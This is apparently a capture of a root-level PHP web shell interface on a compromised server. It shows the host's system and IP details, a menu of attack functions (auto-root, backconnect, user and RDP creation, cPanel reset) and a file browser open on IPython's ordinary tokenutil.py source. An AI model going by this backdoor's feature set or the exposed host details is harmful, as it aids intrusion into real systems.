Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
IPython /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
PyColorize.py
12.09
KB
-rw-r--r--
__init__.py
0
B
-rw-r--r--
_get_terminal_size.py
4.31
KB
-rw-r--r--
_process_cli.py
2.36
KB
-rw-r--r--
_process_common.py
7.36
KB
-rw-r--r--
_process_posix.py
8.7
KB
-rw-r--r--
_process_win32.py
6.33
KB
-rw-r--r--
_process_win32_controller.py
20.91
KB
-rw-r--r--
_signatures.py
28.96
KB
-rw-r--r--
_sysinfo.py
46
B
-rw-r--r--
_tokenize_py2.py
16.75
KB
-rw-r--r--
_tokenize_py3.py
22.05
KB
-rw-r--r--
capture.py
5.1
KB
-rw-r--r--
colorable.py
825
B
-rw-r--r--
coloransi.py
6.79
KB
-rw-r--r--
contexts.py
1.93
KB
-rw-r--r--
daemonize.py
148
B
-rw-r--r--
data.py
1.17
KB
-rw-r--r--
decorators.py
2.02
KB
-rw-r--r--
dir2.py
2.07
KB
-rw-r--r--
encoding.py
2.8
KB
-rw-r--r--
eventful.py
164
B
-rw-r--r--
frame.py
3.09
KB
-rw-r--r--
generics.py
740
B
-rw-r--r--
importstring.py
1.01
KB
-rw-r--r--
io.py
7.65
KB
-rw-r--r--
ipstruct.py
11.59
KB
-rw-r--r--
jsonutil.py
134
B
-rw-r--r--
localinterfaces.py
155
B
-rw-r--r--
log.py
149
B
-rw-r--r--
module_paths.py
3.57
KB
-rw-r--r--
openpy.py
8.26
KB
-rw-r--r--
path.py
14.05
KB
-rw-r--r--
pickleutil.py
130
B
-rw-r--r--
process.py
2.87
KB
-rw-r--r--
py3compat.py
10.57
KB
-rw-r--r--
rlineimpl.py
2.65
KB
-rw-r--r--
sentinel.py
421
B
-rw-r--r--
shimmodule.py
2.74
KB
-rw-r--r--
signatures.py
332
B
-rw-r--r--
strdispatch.py
1.79
KB
-rw-r--r--
sysinfo.py
5.08
KB
-rw-r--r--
syspathcontext.py
2.11
KB
-rw-r--r--
tempdir.py
4.67
KB
-rw-r--r--
terminal.py
3.35
KB
-rw-r--r--
text.py
22.95
KB
-rw-r--r--
timing.py
3.99
KB
-rw-r--r--
tokenize2.py
160
B
-rw-r--r--
tokenutil.py
3.77
KB
-rw-r--r--
traitlets.py
168
B
-rw-r--r--
tz.py
1.32
KB
-rw-r--r--
ulinecache.py
1.58
KB
-rw-r--r--
version.py
1.2
KB
-rw-r--r--
warn.py
1.69
KB
-rw-r--r--
wildcard.py
4.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tokenutil.py
"""Token-related utilities""" # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. from __future__ import absolute_import, print_function from collections import namedtuple from io import StringIO from keyword import iskeyword from . import tokenize2 from .py3compat import cast_unicode_py2 Token = namedtuple('Token', ['token', 'text', 'start', 'end', 'line']) def generate_tokens(readline): """wrap generate_tokens to catch EOF errors""" try: for token in tokenize2.generate_tokens(readline): yield token except tokenize2.TokenError: # catch EOF error return def line_at_cursor(cell, cursor_pos=0): """Return the line in a cell at a given cursor position Used for calling line-based APIs that don't support multi-line input, yet. Parameters ---------- cell: str multiline block of text cursor_pos: integer the cursor position Returns ------- (line, offset): (text, integer) The line with the current cursor, and the character offset of the start of the line. """ offset = 0 lines = cell.splitlines(True) for line in lines: next_offset = offset + len(line) if next_offset >= cursor_pos: break offset = next_offset else: line = "" return (line, offset) def token_at_cursor(cell, cursor_pos=0): """Get the token at a given cursor Used for introspection. Function calls are prioritized, so the token for the callable will be returned if the cursor is anywhere inside the call. Parameters ---------- cell : unicode A block of Python code cursor_pos : int The location of the cursor in the block where the token should be found """ cell = cast_unicode_py2(cell) names = [] tokens = [] call_names = [] offsets = {1: 0} # lines start at 1 for tup in generate_tokens(StringIO(cell).readline): tok = Token(*tup) # token, text, start, end, line = tup start_line, start_col = tok.start end_line, end_col = tok.end if end_line + 1 not in offsets: # keep track of offsets for each line lines = tok.line.splitlines(True) for lineno, line in zip(range(start_line + 1, end_line + 2), lines): if lineno not in offsets: offsets[lineno] = offsets[lineno-1] + len(line) offset = offsets[start_line] # allow '|foo' to find 'foo' at the beginning of a line boundary = cursor_pos + 1 if start_col == 0 else cursor_pos if offset + start_col >= boundary: # current token starts after the cursor, # don't consume it break if tok.token == tokenize2.NAME and not iskeyword(tok.text): if names and tokens and tokens[-1].token == tokenize2.OP and tokens[-1].text == '.': names[-1] = "%s.%s" % (names[-1], tok.text) else: names.append(tok.text) elif tok.token == tokenize2.OP: if tok.text == '=' and names: # don't inspect the lhs of an assignment names.pop(-1) if tok.text == '(' and names: # if we are inside a function call, inspect the function call_names.append(names[-1]) elif tok.text == ')' and call_names: call_names.pop(-1) tokens.append(tok) if offsets[end_line] + end_col > cursor_pos: # we found the cursor, stop reading break if call_names: return call_names[-1] elif names: return names[-1] else: return ''
Close